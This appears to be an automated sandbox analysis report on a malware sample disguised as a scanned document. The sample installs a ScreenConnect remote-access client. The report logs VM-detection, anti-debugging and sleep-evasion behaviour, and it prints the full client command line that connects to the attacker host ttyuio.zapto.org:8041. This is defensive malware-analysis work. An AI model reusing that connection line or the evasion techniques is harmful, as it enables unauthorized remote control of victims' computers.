Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Thread delayed: delay time: 40000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599669	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599411	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599290	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599184	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598926	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597977	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597630	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597512	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597368	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597253	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596358	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596030	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595365	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593230	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593114	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592760	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592639	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592531	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\	Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: dfsvc.exe, 00000001.00000002.2641007006.00000261F9A7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2959958449.0000013D88E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2961804623.0000013D8E254000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: dfsvc.exe, 00000001.00000002.2634391699.00000261F76E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: dfsvc.exe, 00000001.00000002.2641007006.00000261F9A7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWyc
Source: ScreenConnect.ClientService.exe, 0000000B.00000002.2972741197.00000000044C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrr
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe

Code function: 0_2_005E4573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_005E4573

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe

0_2_005E1000

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe

Code function: 0_2_005E3677 mov eax, dword ptr fs:[00000030h]

0_2_005E3677

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe

Code function: 0_2_005E6893 GetProcessHeap,

0_2_005E6893

Enables debug privileges

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Process token adjusted: Debug

Launches processes in debugging mode, may be used to hinder debugging

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe

Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Code function: 0_2_005E1493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_005E1493
Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Code function: 0_2_005E4573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_005E4573
Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Code function: 0_2_005E191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_005E191F
Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Code function: 0_2_005E1AAC SetUnhandledExceptionFilter,	0_2_005E1AAC

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: ScreenConnect.ClientService.dll.1.dr, ClientService.cs	Reference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT \| WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7140 -ip 7140	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 884	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\j1ypwlr7.xwh\pyk78ccc.bvg\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\screenconnect.clientservice.exe" "?e=support&y=guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"
Source: unknown	Process created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\j1ypwlr7.xwh\pyk78ccc.bvg\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\screenconnect.clientservice.exe" "?e=support&y=guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\j1ypwlr7.xwh\pyk78ccc.bvg\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\screenconnect.clientservice.exe" "?e=support&y=guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"	Jump to behavior

Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1953506652.0000000000102000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr	Binary or memory string: Progman
Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1953506652.0000000000102000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr	Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass

Language, Device and Operating System Detection

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe

Code function: 0_2_005E1BD4 cpuid

0_2_005E1BD4

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
